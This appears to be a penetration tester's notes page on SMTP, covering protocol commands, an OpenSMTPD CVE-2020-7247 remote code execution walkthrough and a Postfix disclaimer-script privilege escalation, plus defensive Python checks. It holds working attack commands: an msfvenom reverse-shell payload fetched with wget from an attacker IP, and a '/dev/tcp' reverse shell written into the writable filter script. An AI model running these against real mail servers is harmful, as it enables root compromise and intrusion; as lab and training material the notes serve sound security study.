25,587 - SMTP

The Simple Mail Transfer Protocol (SMTP) is used to send email on ports 25 and 587. Port 25 is used mainly for server-to-server delivery and is often blocked by ISPs to prevent spam. Port 587 (submission) is used by clients to send mail through their provider; it requires authentication (username and password) and is the modern, secure way to submit outgoing mail.

Usage

# Connect to SMTP server
telnet mail.example.com 25
openssl s_client -starttls smtp -connect <ip>:587   # 587 starts in plaintext and upgrades with STARTTLS

# Greet the server
HELO attacker.com
# or
EHLO attacker.com          # Extended SMTP (for authentication & more)

# Specify the sender email
MAIL FROM:<sender@example.com>

# Specify the recipient email
RCPT TO:<recipient@example.com>

# Start composing the email message
DATA

# Write email headers and body (end with a single dot '.' on a line)
Subject: Test Email

This is the email body.
.

# Authenticate using base64 encoded username and password (if needed)
AUTH LOGIN
<base64-username>
<base64-password>

# Close the session
QUIT

Servers

OpenSMTPD - RCE

OpenSMTPD is a free and open-source mail transfer agent (MTA) developed as part of the OpenBSD project. Designed with security and simplicity in mind, it implements SMTP to handle the sending and receiving of email. OpenSMTPD aims to provide a secure and easy-to-audit alternative to more complex MTAs. It is commonly deployed on Unix-like systems and is known for its minimal codebase, privilege separation, and strict adherence to secure coding practices.

OpenSMTPD versions 6.4 through 6.6.1 are vulnerable to CVE-2020-7247, which allows RCE as root via specially crafted SMTP messages. The issue arises from improper input validation in the smtpctl or mail-from handling logic, where attacker-supplied input is passed directly to a shell without sanitization. By sending a maliciously crafted sender address, arbitrary shell commands can be executed on the target system with elevated privileges.
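The sender-address validation this paragraph refers to, applied to the session syntax from the Usage section, as an added example (not OpenSMTPD's code and not part of the original notes): a simplified RFC 5321 local-part check run over a constructed SMTP transcript, so that any MAIL FROM value a hardened MTA would refuse is flagged. The atext character set and the "empty domain means local host" rule are assumptions modelled on the protocol and on the patched behaviour, not taken from the page.

```python
import re

# RFC 5321 "atext": the characters allowed in an unquoted local part. Simplified
# stand-in for OpenSMTPD's own check, not the project's code.
ATEXT = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
            "0123456789!#$%&'*+-/=?^_`{|}~")

def valid_localpart(local):
    """Dot-atom rule: one or more non-empty atoms of atext separated by dots."""
    return all(atom and set(atom) <= ATEXT for atom in local.split("."))

def valid_domainpart(domain):
    """Plain hostname labels only; address literals ([1.2.3.4]) are rejected here."""
    return re.fullmatch(r"[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*", domain) is not None

def mail_from_is_safe(addr):
    """True only if both halves of a MAIL FROM address validate.
    An empty domain ('user@') is filled with the local host, as OpenSMTPD does;
    the local part is validated anyway, which is the step the vulnerable
    6.6.1 code path skipped."""
    local, sep, domain = addr.rpartition("@")
    if not sep:
        return False
    return valid_localpart(local) and valid_domainpart(domain or "localhost")

def suspicious_senders(transcript):
    """Return every MAIL FROM value in a captured SMTP session that fails."""
    hits = []
    for line in transcript.splitlines():
        m = re.match(r"(?i)MAIL FROM:\s*<(.*)>", line.strip())
        if m and not mail_from_is_safe(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed session: two ordinary senders and two that a hardened MTA rejects.
SAMPLE_SESSION = """\
EHLO client.example
MAIL FROM:<sender@example.com>
RCPT TO:<recipient@example.com>
MAIL FROM:<first.last@mail.example.org>
MAIL FROM:<john;doe@>
MAIL FROM:<space here@example.com>
"""

if __name__ == "__main__":
    print(suspicious_senders(SAMPLE_SESSION))  # ['john;doe@', 'space here@example.com']
```

The same function can be pointed at an MTA's logged MAIL FROM lines to spot probing for this class of bug on a still-unpatched host.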

$ searchsploit OpenSMTPD
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py

# Create reverse shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=25 -f elf -o revshell.elf

# Transfer malicious file
$ python3 47984.py bratarina 25 "wget 192.168.45.170/revshell.elf -O /tmp/revshell.elf"

# Assign execute permissions
$ python3 47984.py bratarina 25 "chmod +x /tmp/revshell.elf && /tmp/revshell.elf"

# Execute the file
$ python3 47984.py bratarina 25 "/tmp/revshell.elf"

Postfix

Postfix is an MTA used on Unix-like systems to route and deliver email. It typically listens on TCP port 25 and is widely deployed as a default mail server because of its speed, ease of configuration, and security features.

Disclaimer Files

A disclaimer file, in the context of SMTP email systems, is typically a plaintext, bash-script, or HTML-formatted message automatically appended to the body of outbound emails. It is most commonly used to attach legal warnings, confidentiality notices, or company branding. These disclaimers are not a function of the SMTP protocol itself; they are implemented through external tools or content filters that process outgoing mail before it reaches the final MTA.

In practice, these disclaimers are inserted using mail filters or milter-compatible tools like altermime, MIMEDefang, or Amavis, often integrated into MTAs such as Postfix, Exim, or Sendmail. The disclaimer content is usually stored in a local file, and its location depends on the specific configuration of the mail system. Common paths include /etc/postfix/disclaimer.txt, /usr/local/etc/disclaimer.txt, or within a custom script or filter directory.

# Sending an email
swaks --to targetEmail@domain.com --from x7331@domain.com --header "Subject: Disclaimer file" --body @body.txt --server <target-IP> --port 25

# Watching with pspy as the mail is processed: the disclaimer script is run automatically
$ ./pspy64
2025/07/26 15:33:12 CMD: UID=997   PID=38173  | pipe -n dfilt -t unix flags=Rq user=filter argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
2025/07/26 15:33:12 CMD: UID=997   PID=38174  | /bin/bash /etc/postfix/disclaimer -f x7331@domain.com -- targetEmail@domain.com

If the disclaimer script is writable by the current user (for example through its group), this can be leveraged for privilege escalation:

# Check which files the filter group has permissions on
$ find / -group filter 2>/dev/null
/etc/postfix/disclaimer

# Linpeas can also highlight it
╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
  Group filter:
/etc/postfix/disclaimer

# Insert reverse shell code into the file
$ head /etc/postfix/disclaimer
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.170/80 0>&1

On the next email sent, the reverse shell code will be executed.
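To check the wiring this section describes from the defending side, here is an added example (not part of the original notes and not Postfix code) that parses a pipe(8) master.cf entry shaped like the one in the pspy output and reports whether the filter script it names can be modified by anyone other than root, which is the condition the find and linpeas output above exposes. The master.cf line is constructed, and "only root may own or write the script" is an assumption about sound configuration.

```python
import grp
import os
import pwd
import re
import stat

# Constructed master.cf entry shaped like the pipe(8) transport in the pspy output
# above; the real file would be /etc/postfix/master.cf.
MASTER_CF_ENTRY = ("dfilt unix - n n - - pipe flags=Rq user=filter "
                   "argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}")

def parse_pipe_transport(entry):
    """Return (run_as_user, script_path) from a pipe(8) entry, or None."""
    user = re.search(r"\buser=([^\s:]+)", entry)
    argv = re.search(r"\bargv=(\S+)", entry)
    if not (user and argv):
        return None
    return user.group(1), argv.group(1)

def script_findings(mode, owner, group):
    """Pure check on the script's permission bits and owner. The script runs
    for every outbound mail, so anyone who can edit it runs code as the pipe
    user; only root should be able to change it."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    if mode & stat.S_IWGRP:
        findings.append(f"group-writable by '{group}'")
    if owner != "root":
        findings.append(f"owned by '{owner}' rather than root")
    return findings

def audit_pipe_transport(entry):
    """Locate the filter script named in master.cf and report who could alter it."""
    parsed = parse_pipe_transport(entry)
    if parsed is None:
        return ["not a pipe transport with user= and argv="]
    run_as_user, script = parsed
    try:
        st = os.stat(script)
    except FileNotFoundError:
        return [f"{script}: not found"]
    owner = pwd.getpwuid(st.st_uid).pw_name
    group = grp.getgrgid(st.st_gid).gr_name
    mode = stat.S_IMODE(st.st_mode)
    return [f"{script} (runs as {run_as_user}): {f}"
            for f in script_findings(mode, owner, group)] or [f"{script}: ok"]

if __name__ == "__main__":
    print(audit_pipe_transport(MASTER_CF_ENTRY))
```

In the scenario above the script is group-writable by filter; a root-owned script with mode 755 produces no findings, which is the state to restore.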
